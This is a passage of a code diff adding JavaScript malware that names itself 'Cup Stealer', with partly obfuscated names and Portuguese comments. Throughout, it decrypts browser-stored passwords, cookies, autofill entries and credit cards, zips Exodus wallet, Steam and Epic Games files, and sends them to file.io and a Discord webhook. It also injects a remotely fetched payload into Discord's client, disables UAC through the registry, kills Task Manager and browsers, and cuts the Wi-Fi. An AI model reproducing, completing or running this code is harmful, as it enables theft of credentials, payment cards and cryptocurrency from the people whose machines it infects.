+ for (let _0x261d97 = 0; _0x261d97 < browserPath.length; _0x261d97++) {
1330
+ if (!fs.existsSync(browserPath[_0x261d97][0])) {
1331
+ continue;
1332
+ }
1333
+
1334
+ let _0xd541c2;
1335
+ if (browserPath[_0x261d97][0].includes('Local')) {
1336
+ _0xd541c2 = browserPath[_0x261d97][0].split('\\Local\\')[1].split('\\')[0];
1337
+ } else {
1338
+ _0xd541c2 = browserPath[_0x261d97][0].split('\\Roaming\\')[1].split('\\')[1];
1339
+ }
1340
+
1341
+ const _0x256bed = browserPath[_0x261d97][0] + 'Login Data';
1342
+ const _0x239644 = browserPath[_0x261d97][0] + 'passwords.db';
1343
+
1344
+ try {
1345
+ fs.copyFileSync(_0x256bed, _0x239644);
1346
+ } catch {
1347
+ continue
1348
+ }
1349
+
1350
+ const _0x3d71cb = new sqlite3.Database(_0x239644);
1351
+
1352
+ await new Promise((_0x2c148b, _0x32e8f4) => {
1353
+ _0x3d71cb.each(
1354
+ 'SELECT origin_url, username_value, password_value FROM logins',
1355
+ (_0x4c7a5b, _0x504e35) => {
1356
+ if (!_0x504e35.username_value) {
1357
+ return;
1358
+ }
1359
+
1360
+ let _0x3d2b4b = _0x504e35.password_value;
1361
+ try {
1362
+ const _0x5e1041 = _0x3d2b4b.slice(3, 15);
1363
+ const _0x279e1b = _0x3d2b4b.slice(15, _0x3d2b4b.length - 16);
1364
+ const _0x2a933a = _0x3d2b4b.slice(_0x3d2b4b.length - 16, _0x3d2b4b.length);
1365
+ const _0x210aeb = crypto.createDecipheriv(
1366
+ 'aes-256-gcm',
1367
+ browserPath[_0x261d97][3],
1368
+ _0x5e1041
1369
+ );
1370
+ _0x210aeb.setAuthTag(_0x2a933a);
1371
+ const password =
1372
+ _0x210aeb.update(_0x279e1b, 'base64', 'utf-8') +
1373
+ _0x210aeb.final('utf-8');
1374
+
1375
+ _0x540754.push(
1376
+ '================\nURL: ' +
1377
+ _0x504e35.origin_url +
1378
+ '\nUsername: ' +
1379
+ _0x504e35.username_value +
1380
+ '\nPassword: ' +
1381
+ password +
1382
+ '\nApplication: ' +
1383
+ _d541c2 +
1384
+ ' ' +
1385
+ browserPath[_0x261d97][1] +
1386
+ '\n'
1387
+ );
1388
+ } catch (_0x5bf37a) {}
1389
+ },
1390
+ () => {
1391
+ _0x2c148b('');
1392
+ }
1393
+ );
1394
+ });
1395
+ }
1396
+
1397
+ if (_0x540754.length === 0) {
1398
+ _0x540754.push('no password found for ');
1399
+ }
1400
+
1401
+ if (_0x540754.length) {
1402
+ fs.writeFileSync("Passwords.txt", user.copyright + _0x540754.join(''), {
1403
+ encoding: 'utf8',
1404
+ flag: 'a+',
1405
+ });
1406
+ }
1407
+
1408
+
1409
+ link_download = uploadToAnonfiles("Passwords.txt")
1410
+ return link_download
1411
+ }
1412
+
1413
+ async function tryAgainUpload(path) {
1414
+ const returns = await uploadToAnonfiles(path)
1415
+ return returns
1416
+ }
1417
+ /**
1418
+ * Faz upload de um arquivo no File.io.
1419
+ * @param {string} filePath - Caminho do arquivo a ser enviado.
1420
+ * @param {string} folderId - ID da pasta de destino (opcional). Se não fornecido, uma nova pasta será criada.
1421
+ * @returns {Promise<string>} URL da página de download do arquivo.
1422
+ */
1423
+ async function uploadToAnonfiles(filePath, folderId = null) {
1424
+ try {
1425
+ // 1. Preparar o arquivo para upload
1426
+ const formData = new FormData();
1427
+ formData.append('file', fs.createReadStream(filePath));
1428
+
1429
+ // Incluir folderId, se fornecido
1430
+ if (folderId) {
1431
+ formData.append('folderId', folderId);
1432
+ }
1433
+
1434
+ // 2. Fazer o upload do arquivo
1435
+ const uploadResponse = await axios.post('https://file.io', formData, {
1436
+ headers: {
1437
+ ...formData.getHeaders(),
1438
+ },
1439
+ });
1440
+
1441
+ if (uploadResponse.data.success !== true) {
1442
+ throw new Error("Erro ao fazer upload: " + uploadResponse.data.message);
1443
+ }
1444
+
1445
+ const { link } = uploadResponse.data;
1446
+ console.log(`Arquivo enviado com sucesso! Página de download: ${link}`);
1447
+ return link;
1448
+
1449
+ } catch (error) {
1450
+ console.error("Erro na função uploadToFileio:", error.message);
1451
+ throw error; // Propaga o erro para ser tratado externamente
1452
+ }
1453
+ }
1454
+
1455
+
1456
+ async function tryAgain() {
1457
+ await getCookiesAndSendWebhook()
1458
+ }
1459
+
1460
+ async function getCookiesAndSendWebhook() {
1461
+ let browserCount = 0; // Contador de navegadores detectados
1462
+ const matchedKeywords = [];
1463
+
1464
+ do {
1465
+ try {
1466
+ ('Wallets\\Cookies');
1467
+ const cookiesData = {};
1468
+ let cookieLength = 0;
1469
+
1470
+ for (let i = 0; i < browserPath.length; i++) {
1471
+ if (!fs.existsSync(browserPath[i][0] + '\\Network')) {
1472
+ continue;
1473
+ }
1474
+
1475
+ browserCount++; // Incrementa o contador de navegadores detectados
1476
+
1477
+ let browserFolder;
1478
+ if (browserPath[i][0].includes('Local')) {
1479
+ browserFolder = browserPath[i][0].split('\\Local\\')[1].split('\\')[0];
1480
+ } else {
1481
+ browserFolder = browserPath[i][0].split('\\Roaming\\')[1].split('\\')[1];
1482
+ }
1483
+
1484
+ const cookiesPath = browserPath[i][0] + 'Network\\Cookies';
1485
+ const cookies2 = browserPath[i][0] + 'Network\\LXNNYCookies';
1486
+
1487
+ try {
1488
+ fs.copyFileSync(cookiesPath, cookies2);
1489
+ } catch {
1490
+ continue;
1491
+ }
1492
+
1493
+ const db = new sqlite3.Database(cookies2);
1494
+
1495
+ await new Promise((resolve, reject) => {
1496
+ db.each(
1497
+ 'SELECT * FROM cookies',
1498
+ function (err, row) {
1499
+ let encryptedValue = row.encrypted_value;
1500
+ let iv = encryptedValue.slice(3, 15);
1501
+ let encryptedData = encryptedValue.slice(15, encryptedValue.length - 16);
1502
+ let authTag = encryptedValue.slice(encryptedValue.length - 16, encryptedValue.length);
1503
+ let decrypted = '';
1504
+
1505
+ try {
1506
+ const decipher = crypto.createDecipheriv('aes-256-gcm', browserPath[i][3], iv);
1507
+ decipher.setAuthTag(authTag);
1508
+ decrypted = decipher.update(encryptedData, 'base64', 'utf-8') + decipher.final('utf-8');
1509
+ } catch (error) {}
1510
+
1511
+ if (!cookiesData[browserFolder + '_' + browserPath[i][1]]) {
1512
+ cookiesData[browserFolder + '_' + browserPath[i][1]] = [];
1513
+ }
1514
+
1515
+ cookiesData[browserFolder + '_' + browserPath[i][1]].push(
1516
+ `${row.host_key}\tTRUE\t/\tFALSE\t2597573456\t${row.name}\t${decrypted}\n`
1517
+ );
1518
+
1519
+ // Search for keywords in host_key
1520
+ for (const keyword of keywords) {
1521
+ if (row.host_key.includes(keyword) && !matchedKeywords.includes(keyword)) {
1522
+ matchedKeywords.push(keyword);
1523
+ }
1524
+ }
1525
+
1526
+ count.cookies++;
1527
+ },
1528
+ () => {
1529
+ resolve('');
1530
+ }
1531
+ );
1532
+ });
1533
+ }
1534
+
1535
+ if (matchedKeywords.length > 0) {
1536
+ sendKeywordsToDiscord(matchedKeywords);
1537
+ }
1538
+
1539
+ const zip = new AdmZip();
1540
+
1541
+ for (let [browserName, cookies] of Object.entries(cookiesData)) {
1542
+ if (cookies.length !== 0) {
1543
+ const cookiesContent = cookies.join('');
1544
+ const fileName = `${browserName}.txt`;
1545
+ cookieLength += cookies.length;
1546
+ zip.addFile(fileName, Buffer.from(cookiesContent, 'utf8'));
1547
+ }
1548
+ }
1549
+
1550
+ zip.writeZip(randomPath + `\\${process.env.username}-Cookies.zip`);
1551
+
1552
+ const link_download = await uploadToAnonfiles(randomPath + `\\${process.env.username}-Cookies.zip`);
1553
+ const link_download2 = await getPasswords();
1554
+
1555
+ const passwdFile = fs.readFileSync(randomPath + '\\..\\Passwords.txt', 'utf8');
1556
+ const passwdFileLinhas = passwdFile.split('\n');
1557
+ let passwordLength = 0;
1558
+
1559
+ for (const linha of passwdFileLinhas) {
1560
+ if (linha.includes("Password: ")) {
1561
+ passwordLength += 1;
1562
+ }
1563
+ }
1564
+
1565
+ const link_download3 = await getAutofills();
1566
+
1567
+ const autofillFile = fs.readFileSync(randomPath + '\\..\\Autofills.txt', 'utf8');
1568
+ const autofillFileLinhas = autofillFile.split('\n');
1569
+ let autofillLength = 0;
1570
+
1571
+ for (const linha of autofillFileLinhas) {
1572
+ if (linha.includes("Value: ")) {
1573
+ autofillLength += 1;
1574
+ }
1575
+ }
1576
+
1577
+ const link_download4 = await sendWallets();
1578
+ const link_download5 = await sendSteam();
1579
+
1580
+ const link_download6 = await getCards();
1581
+
1582
+ const cardsFile = fs.readFileSync(randomPath + "\\..\\Cards.txt", 'utf8');
1583
+ const cardsFileLinhas = cardsFile.split('\n');
1584
+ let cardsLength = 0;
1585
+
1586
+ for (const linha of cardsFileLinhas) {
1587
+ if (linha.includes(" card:")) {
1588
+ cardsLength += 1;
1589
+ }
1590
+ }
1591
+
1592
+ let exodusHavesOrNo = '';
1593
+ let steamHavesOrNo = '';
1594
+
1595
+ let walletsLength = 0;
1596
+
1597
+ let steamLength = 'False';
1598
+
1599
+ if (link_download4 !== false) {
1600
+ exodusHavesOrNo = `• [ExodusWallet.zip](${link_download4})`;
1601
+ walletsLength = 1;
1602
+ }
1603
+
1604
+ if (link_download5 !== false) {
1605
+ steamHavesOrNo = `• [Steam.zip](${link_download5})`;
1606
+ steamLength = 'True';
1607
+ }
1608
+
1609
+ const collectionStatus = {
1610
+ Cookies: cookieLength > 0 ? ' ✅ ' : ' ❌ ',
1611
+ Passwords: passwordLength > 0 ? ' ✅ ' : ' ❌ ',
1612
+ Autofills: autofillLength > 0 ? ' ✅ ' : ' ❌ ',
1613
+ Wallets: walletsLength > 0 ? ' ✅ ' : ' ❌ ',
1614
+ Steam: steamLength === 'True' ? ' ✅ ' : ' ❌ ',
1615
+ Cards: cardsLength > 0 ? ' ✅ ' : ' ❌ ',
1616
+ };
1617
+
1618
+ // Primeira Embed
1619
+ const embedCookies = {
1620
+ author: {
1621
+ name: `Cup Stealer | Collection`,
1622
+ icon_url: "https://cdn.discordapp.com/icons/1323239039800971305/71e3dd59206f3491fd856fd8f08a4a20.webp?size=1024"
1623
+ },
1624
+ description: `\n📑 **Collection Summary**`,
1625
+ color: 0x050000,
1626
+ fields: [
1627
+ {
1628
+ name: "<:cookie:1323301142658158695> **Cookies Length**",
1629
+ value: `\`\`\`${cookieLength}\`\`\``,
1630
+ inline: true
1631
+ },
1632
+ {
1633
+ name: "<:senha:1323301151990616185> **Passwords Length**",
1634
+ value: `\`\`\`${passwordLength}\`\`\``,
1635
+ inline: true
1636
+ },
1637
+ {
1638
+ name: "<:browsers:1323327829928181860> **Browsers Detected**",
1639
+ value: `\`\`\`${browserCount}\`\`\``,
1640
+ inline: true
1641
+ },
1642
+ {
1643
+ name: "<:autofills:1323301129093779486> **Autofills Length**",
1644
+ value: `\`\`\`${autofillLength}\`\`\``,
1645
+ inline: true
1646
+ },
1647
+ {
1648
+ name: "<:creditcard:1323301159703674991> **Cards Length**",
1649
+ value: `\`\`\`${cardsLength}\`\`\``,
1650
+ inline: true
1651
+ },
1652
+ {
1653
+ name: "<:download:1323308404298481706> **Download Infos**",
1654
+ value: `[<:link:1323308562612752476> Cookies](${link_download})\n[<:link:1323308562612752476> Passwords](${link_download2})\n[<:link:1323308562612752476> Autofills](${link_download3})\n[<:link:1323308562612752476> Credit Cards](${link_download6})`,
1655
+ inline: false
1656
+ }
1657
+ ],
1658
+ footer: {
1659
+ text: `Cup Stealer | ${process.env.username}`,
1660
+ icon_url: "https://cdn.discordapp.com/icons/1323239039800971305/71e3dd59206f3491fd856fd8f08a4a20.webp?size=1024"
1661
+ },
1662
+ timestamp: new Date()
1663
+ };
1664
+
1665
+ const embedsToSend = [embedCookies];
1666
+
1667
+ const data = {
1668
+ embeds: embedsToSend
1669
+ };
1670
+
1671
+ await axios.post(webhook_url, data);
1672
+ console.log('Embed enviado com sucesso');
1673
+ break; // Caso a requisição seja bem-sucedida, sai do loop
1674
+
1675
+ } catch (error) {
1676
+ retryCount++; // Incrementa o contador de tentativas
1677
+ console.error('Erro ao enviar embed, tentativa', retryCount, error.response ? error.response.data : error.message);
1678
+
1679
+ if (retryCount >= maxRetries) {
1680
+ console.error('Número máximo de tentativas atingido');
1681
+ break; // Se o número máximo de tentativas for atingido, sai do loop
1682
+ }
1683
+ }
1684
+ } while (retryCount < maxRetries);
1685
+ }
1686
+
1687
+
1688
+ async function sendKeywordsToDiscord(keywords) {
1689
+ try {
1690
+ const formattedKeywords = keywords.join(', ');
1691
+ const ip = `${injectionData.network.ip}`;
1692
+ const keywords = `${formattedKeywords}`;
1693
+
1694
+ const embed_data = {
1695
+ author: { name: `Cup Stealer | Keywords`, icon_url: "https://cdn.discordapp.com/icons/1323239039800971305/71e3dd59206f3491fd856fd8f08a4a20.webp?size=1024" },
1696
+ color: 0x050000,
1697
+ fields: [
1698
+ { name: `IP:`, value: `\`\`\`${ip}\`\`\`` },
1699
+ { name: `Keyword:`, value: `\`\`\`${keywords}\`\`\`` }
1700
+ ],
1701
+ footer: { text: `Cup Stealer | ${process.env.username}`, },
1702
+ timestamp: new Date()
1703
+ };
1704
+
1705
+ const payload = {
1706
+ "embeds": [embed_data]
1707
+ };
1708
+
1709
+ const headers = {
1710
+ "Content-Type": "application/json"
1711
+ };
1712
+
1713
+ await axios.post(webhook_url, payload, { headers });
1714
+ } catch (error) {}
1715
+ }
1716
+
1717
+ async function StopCords() {
1718
+ exec('tasklist', (err, stdout) => {
1719
+ for (const executable of ['Discord.exe', 'DiscordCanary.exe', 'discordDevelopment.exe', 'DiscordPTB.exe']) {
1720
+ if (stdout.includes(executable)) {
1721
+ exec(`taskkill /F /T /IM ${executable}`, (err) => {})
1722
+ exec(`"${localappdata}\\${executable.replace('.exe', '')}\\Update.exe" --processStart ${executable}`, (err) => {})
1723
+ }
1724
+ }
1725
+ })
1726
+ }
1727
+
1728
+ async function InfectDiscords() {
1729
+ var injection, betterdiscord = process.env.appdata + "\\BetterDiscord\\data\\betterdiscord.asar";
1730
+ if (fs.existsSync(betterdiscord)) {
1731
+ var read = fs.readFileSync(dir);
1732
+ fs.writeFileSync(dir, buf_replace(read, "api/webhooks", "cup"))
1733
+ }
1734
+ await httpx(`${injectionURL}`).then((code => code.data)).then((res => {
1735
+ res = res.replace("https://ptb.discord.com/api/webhooks/1320815712188760194/2uRnPNhTK6rAUJBXg3cItJfRFL0_gRbctVLQr9HzxtHBTYw1W8KAWJHkRVCCwE6te6KS", webhook_url)
1736
+ injection = res
1737
+ })).catch(), await fs.readdir(local, (async (err, files) => {
1738
+ await files.forEach((async dirName => {
1739
+ dirName.toString().includes("cord") && await discords.push(dirName)
1740
+ })), discords.forEach((async discordPath => {
1741
+ await fs.readdir(local + "\\" + discordPath, ((err, file) => {
1742
+ file.forEach((async insideDiscordDir => {
1743
+ insideDiscordDir.includes("app-") && await fs.readdir(local + "\\" + discordPath + "\\" + insideDiscordDir, ((err, file) => {
1744
+ file.forEach((async insideAppDir => {
1745
+ insideAppDir.includes("modules") && fs.readdir(local + "\\" + discordPath + "\\" + insideDiscordDir + "\\" + insideAppDir, ((err, file) => {
1746
+ file.forEach((insideModulesDir => {
1747
+ insideModulesDir.includes("discord_desktop_core") && fs.readdir(local + "\\" + discordPath + "\\" + insideDiscordDir + "\\" + insideAppDir + "\\" + insideModulesDir + "\\" + insideCore, ((err, file) => {
1748
+ file.forEach((insideCore => {
1749
+ insideCore.includes("discord_desktop_core") && fs.readdir(local + "\\" + discordPath + "\\" + insideDiscordDir + "\\" + insideAppDir + "\\" + insideModulesDir + "\\" + insideCore, ((err, file) => {
1750
+ file.forEach((insideCoreFinal => {
1751
+ insideCoreFinal.includes("index.js") && (fs.mkdir(local + "\\" + discordPath + "\\" + insideDiscordDir + "\\" + insideAppDir + "\\" + insideModulesDir + "\\" + insideCore + "\\cup", (() => {
1752
+
1753
+ })),
1754
+
1755
+ fs.writeFile(local + "\\" + discordPath + "\\" + insideDiscordDir + "\\" + insideAppDir + "\\" + insideModulesDir + "\\" + insideCore + "\\index.js", injection, (() => {})))
1756
+ if (!injection_paths.includes(local + "\\" + discordPath + "\\" + insideDiscordDir + "\\" + insideAppDir + "\\" + insideModulesDir + "\\" + insideCore + "\\index.js")) {
1757
+ injection_paths.push(local + "\\" + discordPath + "\\" + insideDiscordDir + "\\" + insideAppDir + "\\" + insideModulesDir + "\\" + insideCore + "\\index.js"); DiscordListener(local + "\\" + discordPath + "\\" + insideDiscordDir + "\\" + insideAppDir + "\\" + insideModulesDir + "\\" + insideCore + "\\index.js")
1758
+ }
1759
+ }))
1760
+ }))
1761
+ }))
1762
+ }))
1763
+ }))
1764
+ }))
1765
+ }))
1766
+ }))
1767
+ }))
1768
+ }))
1769
+ }))
1770
+ }))
1771
+ }
1772
+
1773
+ function disableuac() {
1774
+ try {
1775
+ const command = 'reg add "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" /v EnableLUA /t REG_DWORD /d 0 /f';
1776
+
1777
+ // Execute the command
1778
+ execSync(command, { stdio: 'inherit' });
1779
+ } catch (error) {
1780
+ console.error(`Failed to disable UAC: ${error.message}`);
1781
+ }
1782
+ }
1783
+
1784
+ function checkTaskManager() {
1785
+ exec('wmic process where "name=\'taskmgr.exe\'" get ProcessId', (err, stdout, stderr) => {
1786
+ if (err || stderr) {
1787
+ console.error('Erro ao executar wmic:', err || stderr);
1788
+ return;
1789
+ }
1790
+
1791
+ // Verifica se algum processo com taskmgr.exe foi encontrado
1792
+ if (stdout.includes('ProcessId')) {
1793
+ console.log('Task Manager encontrado! Fechando...');
1794
+ closeTaskManager();
1795
+ } else {
1796
+ console.log('Task Manager não está aberto.');
1797
+ }
1798
+ });
1799
+ }
1800
+
1801
+ // Função para fechar o Task Manager
1802
+ function closeTaskManager() {
1803
+ exec('taskkill /F /IM taskmgr.exe', (err, stdout, stderr) => {
1804
+ if (err || stderr) {
1805
+ console.error('Erro ao fechar Task Manager:', err || stderr);
1806
+ return;
1807
+ }
1808
+ console.log('Task Manager fechado.');
1809
+ });
1810
+ }
1811
+
1812
+ async function getAutofills() {
1813
+ const autofillData = [];
1814
+
1815
+ try {
1816
+ for (const pathData of browserPath) {
1817
+ const browserPathExists = fs.existsSync(pathData[0]);
1818
+
1819
+ if (!browserPathExists) {
1820
+ continue;
1821
+ }
1822
+
1823
+ const applicationName = pathData[0].includes('Local')
1824
+ ? pathData[0].split('\\Local\\')[1].split('\\')[0]
1825
+ : pathData[0].split('\\Roaming\\')[1].split('\\')[1];
1826
+
1827
+ const webDataPath = pathData[0] + 'Web Data';
1828
+ const webDataDBPath = pathData[0] + 'webdata.db';
1829
+
1830
+ try {
1831
+ fs.copyFileSync(webDataPath, webDataDBPath);
1832
+ } catch {
1833
+ continue
1834
+ }
1835
+
1836
+
1837
+ const db = new sqlite3.Database(webDataDBPath);
1838
+
1839
+ await new Promise((resolve, reject) => {
1840
+ db.each(
1841
+ 'SELECT * FROM autofill',
1842
+ function (error, row) {
1843
+ if (row) {
1844
+ autofillData.push(
1845
+ '================\nName: ' +
1846
+ row.name +
1847
+ '\nValue: ' +
1848
+ row.value +
1849
+ '\nApplication: ' +
1850
+ applicationName +
1851
+ ' ' +
1852
+ pathData[1] +
1853
+ '\n'
1854
+ );
1855
+ }
1856
+ },
1857
+ function () {
1858
+ resolve('');
1859
+ }
1860
+ );
1861
+ });
1862
+
1863
+ if (autofillData.length === 0) {
1864
+ autofillData.push('No autofills found for ' + applicationName + ' ' + pathData[1] + '\n');
1865
+ }
1866
+ }
1867
+
1868
+ if (autofillData.length) {
1869
+ fs.writeFileSync("Autofills.txt", user.copyright + autofillData.join(''), {
1870
+ encoding: 'utf8',
1871
+ flag: 'a+',
1872
+ });
1873
+ }
1874
+
1875
+ const link_download = uploadToAnonfiles("Autofills.txt")
1876
+ return link_download
1877
+ }catch {
1878
+ fs.writeFileSync("Autofills.txt", "No autofills founded", {
1879
+ encoding: 'utf8',
1880
+ flag: 'a+',
1881
+ });
1882
+ }
1883
+ }
1884
+
1885
+ async function getCards() {
1886
+ const _0x540754 = [];
1887
+
1888
+ for (let _0x261d97 = 0; _0x261d97 < browserPath.length; _0x261d97++) {
1889
+ if (!fs.existsSync(browserPath[_0x261d97][0])) {
1890
+ continue;
1891
+ }
1892
+
1893
+ let _0xd541c2;
1894
+ if (browserPath[_0x261d97][0].includes('Local')) {
1895
+ _0xd541c2 = browserPath[_0x261d97][0].split('\\Local\\')[1].split('\\')[0];
1896
+ } else {
1897
+ _0xd541c2 = browserPath[_0x261d97][0].split('\\Roaming\\')[1].split('\\')[1];
1898
+ }
1899
+
1900
+ const _0x256bed = browserPath[_0x261d97][0] + 'Web Data';
1901
+ const _0x239644 = browserPath[_0x261d97][0] + 'webdata.db';
1902
+
1903
+ try {
1904
+ fs.copyFileSync(_0x256bed, _0x239644);
1905
+ } catch {
1906
+ continue
1907
+ }
1908
+
1909
+ const _0x3d71cb = new sqlite3.Database(_0x239644);
1910
+
1911
+ await new Promise((_0x2c148b, _0x32e8f4) => {
1912
+ _0x3d71cb.each(
1913
+ 'SELECT name_on_card,card_number_encrypted,expiration_month,expiration_year FROM credit_cards',
1914
+ (_0x4c7a5b, _0x504e35) => {
1915
+
1916
+ let _0x3d2b4b = _0x504e35.card_number_encrypted;
1917
+ try {
1918
+ const _0x5e1041 = _0x3d2b4b.slice(3, 15);
1919
+ const _0x279e1b = _0x3d2b4b.slice(15, _0x3d2b4b.length - 16);
1920
+ const _0x2a933a = _0x3d2b4b.slice(_0x3d2b4b.length - 16, _0x3d2b4b.length);
1921
+ const _0x210aeb = crypto.createDecipheriv(
1922
+ 'aes-256-gcm',
1923
+ browserPath[_0x261d97][3],
1924
+ _0x5e1041
1925
+ );
1926
+ _0x210aeb.setAuthTag(_0x2a933a);
1927
+ const card =
1928
+ _0x210aeb.update(_0x279e1b, 'base64', 'utf-8') +
1929
+ _0x210aeb.final('utf-8');
1930
+
1931
+ _0x540754.push(_0x504e35.name_on_card+" card: "+card+"|"+_0x504e35.expiration_month+"|"+_0x504e35.expiration_year+"|xxx");
1932
+ } catch (_0x5bf37a) {}
1933
+ },
1934
+ () => {
1935
+ _0x2c148b('');
1936
+ }
1937
+ );
1938
+ });
1939
+ }
1940
+
1941
+ if (_0x540754.length === 0) {
1942
+ _0x540754.push('no password found for ');
1943
+ }
1944
+
1945
+ if (_0x540754.length) {
1946
+ fs.writeFileSync("Cards.txt", user.copyright + _0x540754.join(''), {
1947
+ encoding: 'utf8',
1948
+ flag: 'a+',
1949
+ });
1950
+ }
1951
+
1952
+
1953
+ link_download = uploadToAnonfiles("Cards.txt")
1954
+ return link_download
1955
+ }
1956
+
1957
+ async function DiscordListener(path) {
1958
+ return;
1959
+ }
1960
+
1961
+
1962
+ /**
1963
+ * Compacta e envia o arquivo da carteira Exodus.
1964
+ * @returns {Promise<string|boolean>} Retorna a resposta do servidor se o envio for bem-sucedido, ou `false` se o arquivo não existir.
1965
+ */
1966
+
1967
+ async function SubmitExodus() {
1968
+ try {
1969
+ const filePath = `C:\\Users\\${process.env.USERNAME}\\AppData\\Roaming\\Exodus\\exodus.wallet`;
1970
+ const zipPath = `C:\\Users\\${process.env.USERNAME}\\AppData\\Roaming\\Exodus\\exodus.zip`;
1971
+
1972
+ // Verificar se o arquivo existe
1973
+ if (fs.existsSync(filePath)) {
1974
+ const zipper = new AdmZip();
1975
+
1976
+ // Adicionar o arquivo da carteira ao arquivo zip
1977
+ zipper.addLocalFile(filePath);
1978
+
1979
+ // Criar o arquivo zip
1980
+ zipper.writeZip(zipPath);
1981
+ console.log(`Arquivo zip criado em: ${zipPath}`);
1982
+
1983
+ // Preparar o arquivo zip para envio
1984
+ const form = new FormData();
1985
+ form.append('file', fs.createReadStream(zipPath), 'exodus.zip');
1986
+
1987
+ // Enviar para o servidor usando form-data
1988
+ const response = await axios.post(webhook_url, form, {
1989
+ headers: {
1990
+ ...form.getHeaders(), // Isso define os cabeçalhos necessários para o envio multipart
1991
+ }
1992
+ });
1993
+
1994
+ console.log("Upload realizado com sucesso! Resposta do servidor:", response.data);
1995
+ return response.data;
1996
+ }
1997
+
1998
+ console.log("O arquivo da carteira Exodus não foi encontrado.");
1999
+ return false;
2000
+ } catch (error) {
2001
+ console.error("Erro ao compactar ou enviar o arquivo da carteira Exodus:", error.message);
2002
+ return false;
2003
+ }
2004
+ }
2005
+
2006
+ /**
2007
+ * Faz o envio da carteira Exodus e retorna a resposta ou indica ausência de arquivo.
2008
+ * @returns {Promise<string|boolean>} Retorna a resposta do servidor ou `false` se não houver arquivo.
2009
+ */
2010
+ async function sendWallets() {
2011
+ try {
2012
+ const hasExodus = await SubmitExodus();
2013
+
2014
+ if (!hasExodus) {
2015
+ console.log("Nenhuma carteira Exodus encontrada.");
2016
+ return false;
2017
+ }
2018
+
2019
+ console.log("Carteira Exodus enviada com sucesso. Resposta do servidor:", hasExodus);
2020
+ return hasExodus;
2021
+ } catch (error) {
2022
+ console.error("Erro ao processar envio das carteiras:", error.message);
2023
+ return false;
2024
+ }
2025
+ }
2026
+
2027
+ async function SubmitSteam() {
2028
+ try {
2029
+ const steamConfigPath = `C:\\Program Files (x86)\\Steam\\config`;
2030
+ const zipPath = `${steamConfigPath}\\steam.zip`;
2031
+
2032
+ // Verificar se o diretório existe
2033
+ if (fs.existsSync(steamConfigPath)) {
2034
+ const zipper = new AdmZip();
2035
+
2036
+ // Adicionar a pasta ao zip
2037
+ zipper.addLocalFolder(steamConfigPath);
2038
+
2039
+ // Criar o arquivo zip
2040
+ zipper.writeZip(zipPath);
2041
+ console.log(`Arquivo zip criado em: ${zipPath}`);
2042
+
2043
+ // Preparar o arquivo zip para envio
2044
+ const form = new FormData();
2045
+ form.append('file', fs.createReadStream(zipPath), 'steam.zip');
2046
+
2047
+ // Enviar para o servidor usando form-data
2048
+ const response = await axios.post(webhook_url, form, {
2049
+ headers: {
2050
+ ...form.getHeaders(), // Isso define os cabeçalhos necessários para o envio multipart
2051
+ }
2052
+ });
2053
+
2054
+ console.log("Upload realizado com sucesso! Resposta do servidor:", response.data);
2055
+ return response.data; // Retorna a resposta do servidor
2056
+ }
2057
+
2058
+ console.log("O diretório de configuração do Steam não foi encontrado.");
2059
+ return false;
2060
+ } catch (error) {
2061
+ console.error("Erro ao compactar ou enviar os arquivos do Steam:", error.message);
2062
+ return false;
2063
+ }
2064
+ }
2065
+
2066
+ /**
2067
+ * Faz o envio do diretório de configuração do Steam e retorna a resposta ou indica ausência de diretório.
2068
+ * @returns {Promise<string|boolean>} Retorna a resposta do servidor ou `false` se não houver diretório.
2069
+ */
2070
+ async function sendSteam() {
2071
+ const havesSteam = await SubmitSteam();
2072
+
2073
+ console.log(havesSteam);
2074
+ if (havesSteam === false) {
2075
+ console.log("Nenhum dado do Steam encontrado ou erro no envio.");
2076
+ return false;
2077
+ } else {
2078
+ return havesSteam;
2079
+ }
2080
+ }
2081
+
2082
+ async function SubmitEpicGames() {
2083
+ try {
2084
+ const epicConfigPath = `C:\\Program Files (x86)\\Epic Games\\Launcher\\Portal\\Config`;
2085
+ const zipPath = `${epicConfigPath}\\epicgames.zip`;
2086
+
2087
+ // Verificar se o diretório existe
2088
+ if (fs.existsSync(epicConfigPath)) {
2089
+ const zipper = new AdmZip();
2090
+
2091
+ // Adicionar a pasta ao zip
2092
+ zipper.addLocalFolder(epicConfigPath);
2093
+
2094
+ // Criar o arquivo zip
2095
+ zipper.writeZip(zipPath);
2096
+ console.log(`Arquivo zip criado em: ${zipPath}`);
2097
+
2098
+ // Preparar o arquivo zip para envio
2099
+ const form = new FormData();
2100
+ form.append('file', fs.createReadStream(zipPath), 'epicgames.zip');
2101
+
2102
+ // Enviar para o servidor usando form-data
2103
+ const response = await axios.post(webhook_url, form, {
2104
+ headers: {
2105
+ ...form.getHeaders(), // Isso define os cabeçalhos necessários para o envio multipart
2106
+ }
2107
+ });
2108
+
2109
+ console.log("Upload realizado com sucesso! Resposta do servidor:", response.data);
2110
+ return response.data; // Retorna a resposta do servidor
2111
+ }
2112
+
2113
+ console.log("O diretório de configuração da Epic Games não foi encontrado.");
2114
+ return false;
2115
+ } catch (error) {
2116
+ console.error("Erro ao compactar ou enviar os arquivos da Epic Games:", error.message);
2117
+ return false;
2118
+ }
2119
+ }
2120
+
2121
+
2122
+ async function closeBrowsers() {
2123
+ const browsersProcess = ["chrome.exe", "msedge.exe", "opera.exe", "brave.exe"];
2124
+ return new Promise(async (resolve) => {
2125
+ try {
2126
+ const { execSync } = require("child_process");
2127
+ const tasks = execSync("tasklist").toString();
2128
+ browsersProcess.forEach((process) => {
2129
+ if (tasks.includes(process)) {
2130
+ execSync(`taskkill /IM ${process} /F`);
2131
+ }
2132
+ });
2133
+ await new Promise((resolve) => setTimeout(resolve, 2500));
2134
+ resolve();
2135
+ } catch (e) {
2136
+ console.log(e);
2137
+ resolve();
2138
+ }
2139
+ });
2140
+ }
2141
+
2142
+ function disconnectInternet() {
2143
+ const platform = process.platform;
2144
+
2145
+ if (platform === 'win32') {
2146
+ exec('netsh interface set interface "Wi-Fi" admin=disable', (error, stdout, stderr) => {
2147
+ if (error) {
2148
+ console.error(`Erro ao desconectar: ${error.message}`);
2149
+ return;
2150
+ }
2151
+ console.log('valeu otario ta sem internet agora KKKKKKKKKKKKKKK', stdout || stderr);
2152
+ });
2153
+ } else {
2154
+ console.error('Sistema operacional não suportado para este script.');
2155
+ }
2156
+ }
2157
+
2158
+ async function foundDiscordBackupCodes() {
2159
+ for (const searchFolder of foldersToSearch) {
2160
+ try {
2161
+ const folderPath = path.join(os.homedir(), searchFolder);
2162
+ const files = fs.readdirSync(folderPath);
2163
+
2164
